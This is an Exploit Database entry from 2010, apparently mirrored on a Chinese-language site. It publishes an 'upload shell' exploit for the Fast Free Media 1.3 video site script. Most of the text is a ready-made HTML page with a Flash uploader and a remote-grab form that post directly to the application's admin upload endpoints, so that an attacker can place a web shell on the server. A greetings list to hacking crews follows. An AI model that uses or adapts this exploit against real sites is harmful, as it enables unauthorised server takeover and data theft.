Fast Free Media 1.3 Adult Site – Arbitrary File Upload

• Exploit Database
• 35 阅读

• 作者： indoushka
  日期： 2010-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12569/

• ========================================================================================
  | # Title: Fast Free Media V 1.3 Adult Site Upload Shell Exploiot
  | # Author : indoushka 
  | # email: indoushka@hotmail.com 
  | # Home : www.iqs3cur1ty.com 
  | # Script : Powered by FastFreeMedia.com All Videos Copyright © To Their Respective Owners. All Rights Reserved. 
  | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
  | # Bug: Upload Shell
  | # Download : http://www.fastfreemedia.com/ 
  ======================Exploit By indoushka =================================
   # Exploit: 
   
  If you have FFMPEG installed you can convert your /media/uploads files to .flv <a href="http://127.0.0.1/Ffm/admin/ffmpeg.php">here</a>. Or you can rebuild thumbnails using FFMPEG-PHP <a href="http://127.0.0.1/Ffm/admin/ffmpeg.php?action=thumb">here</a>.
  <div style="clear:both;height:20px;">&nbsp;</div>
  <div class="tabular_data" id="uftd">
  <div class="header"><strong>Select a Media File to Upload</strong> Files will be uploaded to: <em>/media/upload</em></div>
  <table>
  <tr>
  <td align="center">This flash tool has a built in size limit of 50Mb but kicks ass for anything under that. <font style="font-size:10px;font-family:Verdana, Arial, Helvetica, sans-serif" color="#494949">&nbsp; </font><br>
  <OBJECT id="FlashFilesUpload" codeBase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0"
  width="450" height="350" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" VIEWASTEXT>
  <PARAM NAME="FlashVars" VALUE="uploadUrl=http://127.0.0.1/Ffm/admin/uploadfiles.php">
  <PARAM NAME="BGColor" VALUE="#F8F6E6">
  <PARAM NAME="Movie" VALUE="http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf">
  <PARAM NAME="Src" VALUE="http://127.0.0.1/Ffm/admin/ElementITMultiPowUpload1.7.swf">
  <PARAM NAME="WMode" VALUE="Window">
  <PARAM NAME="Play" VALUE="-1">
  <PARAM NAME="Loop" VALUE="-1">
  <PARAM NAME="Quality" VALUE="High">
  <PARAM NAME="SAlign" VALUE="">
  <PARAM NAME="Menu" VALUE="-1">
  <PARAM NAME="Base" VALUE="">
  <PARAM NAME="AllowScriptAccess" VALUE="always">
  <PARAM NAME="Scale" VALUE="ShowAll">
  <PARAM NAME="DeviceFont" VALUE="0">
  <PARAM NAME="EmbedMovie" VALUE="0">
  <PARAM NAME="SWRemote" VALUE="">
  <PARAM NAME="MovieData" VALUE="">
  <PARAM NAME="SeamlessTabbing" VALUE="1">
  <PARAM NAME="Profile" VALUE="0">
  <PARAM NAME="ProfileAddress" VALUE="">
  <PARAM NAME="ProfilePort" VALUE="0">
  <embed bgcolor="#F8F6E6" id="EmbedFlashFilesUpload" src="https://www.exploit-db.com/exploits/12569/ElementITMultiPowUpload1.7.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" 
  		 type="application/x-shockwave-flash" width="450" height="350" flashvars="uploadUrl=uploadfiles.php?username=<?php echo"$username";?>"> </embed>
  </OBJECT></td>
  </tr>
  </table>
  <table>
  <form action="http://127.0.0.1/Ffm/admin/wget.php?action=image&movie=1" method="post">
  <tr>
  <td>Grab from Remote server <em></em></td>
  <td><span class="form">
  <input name="rmtimage" type="text" size="90" />
  </span></td>
  <td class="last"><input type="submit" value="Grab File" /></td>
  </tr>
  </form>
  </table>
  </div>
   
  Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
  Greetz : Exploit-db Team
  all my friend :
  His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
  Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * MR.SoOoFe * ThE g0bL!N
  www.sa-hacker.com *www.alkrsan.net * www.mormoroth.net 
  ------------------------------------------------------------------------------------------------------------------------